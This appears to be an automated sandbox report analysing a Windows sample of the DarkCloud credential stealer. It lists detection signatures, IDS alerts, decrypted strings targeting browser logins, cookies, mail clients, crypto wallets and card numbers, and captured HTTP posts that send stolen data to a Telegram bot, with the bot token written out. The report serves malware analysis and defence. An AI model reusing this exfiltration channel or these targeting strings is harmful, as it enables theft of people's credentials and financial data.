Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wMy37vlfvz.exe

Overview

General Information

Sample name:wMy37vlfvz.exe
renamed because original name is a hash value
Original sample name:16efabc49c172527044fbf2015d1f48531cfb7b306b98fcd5c6fc16b38c68da0.exe
Analysis ID:1562297
MD5:8f6ee9ba8ff5fd89141322d36e8fe46d
SHA1:d316c5f7b286ca316129aed8ddd8baeaaa07961b
SHA256:16efabc49c172527044fbf2015d1f48531cfb7b306b98fcd5c6fc16b38c68da0
Tags:exeuser-adrian__luca
Infos:

Detection

DarkCloud
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DarkCloud
AI detected suspicious sample
Machine Learning detection for sample
PE file has a writeable .text section
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64
  • wMy37vlfvz.exe (PID: 4304 cmdline: "C:\Users\user\Desktop\wMy37vlfvz.exe" MD5: 8F6EE9BA8FF5FD89141322D36E8FE46D)
    • WmiPrvSE.exe (PID: 7156 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DarkCloud StealerStealer is written in Visual Basic.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendMessage?chat_id=6115850689"}
SourceRuleDescriptionAuthorStrings
wMy37vlfvz.exeJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000000.2349408415.0000000000401000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
      Process Memory Space: wMy37vlfvz.exe PID: 4304JoeSecurity_DarkCloudYara detected DarkCloudJoe Security
        Process Memory Space: wMy37vlfvz.exe PID: 4304JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          1.0.wMy37vlfvz.exe.400000.0.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T13:40:24.817386+010020453001A Network Trojan was detected192.168.2.649862149.154.167.220443TCP
            2024-11-25T13:40:36.340536+010020453001A Network Trojan was detected192.168.2.649892149.154.167.220443TCP
            2024-11-25T13:40:47.182620+010020453001A Network Trojan was detected192.168.2.649917149.154.167.220443TCP
            2024-11-25T13:40:58.735747+010020453001A Network Trojan was detected192.168.2.649945149.154.167.220443TCP
            2024-11-25T13:41:09.619388+010020453001A Network Trojan was detected192.168.2.649972149.154.167.220443TCP
            2024-11-25T13:41:20.217958+010020453001A Network Trojan was detected192.168.2.649998149.154.167.220443TCP
            2024-11-25T13:41:31.121876+010020453001A Network Trojan was detected192.168.2.650012149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T13:39:36.915612+010028032742Potentially Bad Traffic192.168.2.649750162.55.60.280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T13:40:15.413974+010028523881Malware Command and Control Activity Detected192.168.2.649841149.154.167.220443TCP
            2024-11-25T13:40:23.770629+010028523881Malware Command and Control Activity Detected192.168.2.649862149.154.167.220443TCP
            2024-11-25T13:40:29.222886+010028523881Malware Command and Control Activity Detected192.168.2.649876149.154.167.220443TCP
            2024-11-25T13:40:35.386318+010028523881Malware Command and Control Activity Detected192.168.2.649892149.154.167.220443TCP
            2024-11-25T13:40:39.774986+010028523881Malware Command and Control Activity Detected192.168.2.649901149.154.167.220443TCP
            2024-11-25T13:40:46.286303+010028523881Malware Command and Control Activity Detected192.168.2.649917149.154.167.220443TCP
            2024-11-25T13:40:50.510179+010028523881Malware Command and Control Activity Detected192.168.2.649927149.154.167.220443TCP
            2024-11-25T13:40:57.891652+010028523881Malware Command and Control Activity Detected192.168.2.649945149.154.167.220443TCP
            2024-11-25T13:41:02.287037+010028523881Malware Command and Control Activity Detected192.168.2.649958149.154.167.220443TCP
            2024-11-25T13:41:08.671070+010028523881Malware Command and Control Activity Detected192.168.2.649972149.154.167.220443TCP
            2024-11-25T13:41:12.671022+010028523881Malware Command and Control Activity Detected192.168.2.649983149.154.167.220443TCP
            2024-11-25T13:41:19.298013+010028523881Malware Command and Control Activity Detected192.168.2.649998149.154.167.220443TCP
            2024-11-25T13:41:23.330619+010028523881Malware Command and Control Activity Detected192.168.2.650007149.154.167.220443TCP
            2024-11-25T13:41:30.190109+010028523881Malware Command and Control Activity Detected192.168.2.650012149.154.167.220443TCP
            2024-11-25T13:41:34.597132+010028523881Malware Command and Control Activity Detected192.168.2.650013149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: wMy37vlfvz.exeAvira: detected
            Source: wMy37vlfvz.exeMalware Configuration Extractor: DarkCloud {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendMessage?chat_id=6115850689"}
            Source: wMy37vlfvz.exeReversingLabs: Detection: 65%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: wMy37vlfvz.exeJoe Sandbox ML: detected
            Source: wMy37vlfvz.exeString decryptor: Cookies
            Source: wMy37vlfvz.exeString decryptor: ^(0x){1}[0-9a-fA-F]{40}$
            Source: wMy37vlfvz.exeString decryptor: ^([13][a-km-zA-HJ-NP-Z1-9]{25,34})|^((bitcoincash:)?(q|p)[a-z0-9]{41})|^((BITCOINCASH:)?(Q|P)[A-Z0-9]{41})$
            Source: wMy37vlfvz.exeString decryptor: ^([r])([1-9A-HJ-NP-Za-km-z]{24,34})$
            Source: wMy37vlfvz.exeString decryptor: ^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$
            Source: wMy37vlfvz.exeString decryptor: ^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$
            Source: wMy37vlfvz.exeString decryptor: ^G[ABCDEFGHIJKLMNOPQRSTUVWXYZ234567]{55}$
            Source: wMy37vlfvz.exeString decryptor: \Default\Login Data
            Source: wMy37vlfvz.exeString decryptor: \Login Data
            Source: wMy37vlfvz.exeString decryptor: //setting[@name='Password']/value
            Source: wMy37vlfvz.exeString decryptor: Password :
            Source: wMy37vlfvz.exeString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: wMy37vlfvz.exeString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
            Source: wMy37vlfvz.exeString decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
            Source: wMy37vlfvz.exeString decryptor: SMTP Email Address
            Source: wMy37vlfvz.exeString decryptor: NNTP Email Address
            Source: wMy37vlfvz.exeString decryptor: Email
            Source: wMy37vlfvz.exeString decryptor: HTTPMail User Name
            Source: wMy37vlfvz.exeString decryptor: HTTPMail Server
            Source: wMy37vlfvz.exeString decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
            Source: wMy37vlfvz.exeString decryptor: Password
            Source: wMy37vlfvz.exeString decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
            Source: wMy37vlfvz.exeString decryptor: Foxmail.exe
            Source: wMy37vlfvz.exeString decryptor: ^3[47][0-9]{13}$
            Source: wMy37vlfvz.exeString decryptor: ^(6541|6556)[0-9]{12}$
            Source: wMy37vlfvz.exeString decryptor: ^389[0-9]{11}$
            Source: wMy37vlfvz.exeString decryptor: ^3(?:0[0-5]|[68][0-9])[0-9]{11}$
            Source: wMy37vlfvz.exeString decryptor: ^63[7-9][0-9]{13}$
            Source: wMy37vlfvz.exeString decryptor: ^(?:2131|1800|35\\d{3})\\d{11}$
            Source: wMy37vlfvz.exeString decryptor: ^9[0-9]{15}$
            Source: wMy37vlfvz.exeString decryptor: ^(6304|6706|6709|6771)[0-9]{12,15}$
            Source: wMy37vlfvz.exeString decryptor: ^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
            Source: wMy37vlfvz.exeString decryptor: Mastercard
            Source: wMy37vlfvz.exeString decryptor: ^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
            Source: wMy37vlfvz.exeString decryptor: ^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
            Source: wMy37vlfvz.exeString decryptor: ^(62[0-9]{14,17})$
            Source: wMy37vlfvz.exeString decryptor: Visa Card
            Source: wMy37vlfvz.exeString decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
            Source: wMy37vlfvz.exeString decryptor: Visa Master Card
            Source: wMy37vlfvz.exeString decryptor: \signons.sqlite
            Source: wMy37vlfvz.exeString decryptor: \logins.json
            Source: wMy37vlfvz.exeString decryptor: mail\
            Source: wMy37vlfvz.exeString decryptor: \Accounts\Account.rec0
            Source: wMy37vlfvz.exeString decryptor: \AccCfg\Accounts.tdat
            Source: wMy37vlfvz.exeString decryptor: EnableSignature
            Source: wMy37vlfvz.exeString decryptor: Application : FoxMail
            Source: wMy37vlfvz.exeString decryptor: encryptedUsername
            Source: wMy37vlfvz.exeString decryptor: logins
            Source: wMy37vlfvz.exeString decryptor: encryptedPassword
            Source: wMy37vlfvz.exeString decryptor: \Cookies
            Source: wMy37vlfvz.exeString decryptor: \Default\Cookies
            Source: wMy37vlfvz.exeString decryptor: \cookies.sqlite
            Source: wMy37vlfvz.exeString decryptor: \cookies.db
            Source: wMy37vlfvz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49841 version: TLS 1.2
            Source: Binary string: W.pdb4 source: wMy37vlfvz.exe

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49841 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49862 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.6:49862 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49876 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49901 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49892 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.6:49892 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49917 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.6:49917 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49927 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49958 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49945 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.6:49945 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49972 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.6:49972 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:50007 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.6:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:50013 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.6:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.6:50012 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 162.55.60.2 162.55.60.2
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: showip.net
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49750 -> 162.55.60.2:80
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 7003Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 634Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
            Source: global trafficDNS traffic detected: DNS query: showip.net
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
            Source: wMy37vlfvz.exe, 00000001.00000003.2422426682.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419621797.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schema.org
            Source: wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.maxmind.com
            Source: wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
            Source: wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/IlD
            Source: wMy37vlfvz.exeString found in binary or memory: https://api.telegram.org/bot
            Source: wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115
            Source: wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/cZ
            Source: wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/wA
            Source: wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
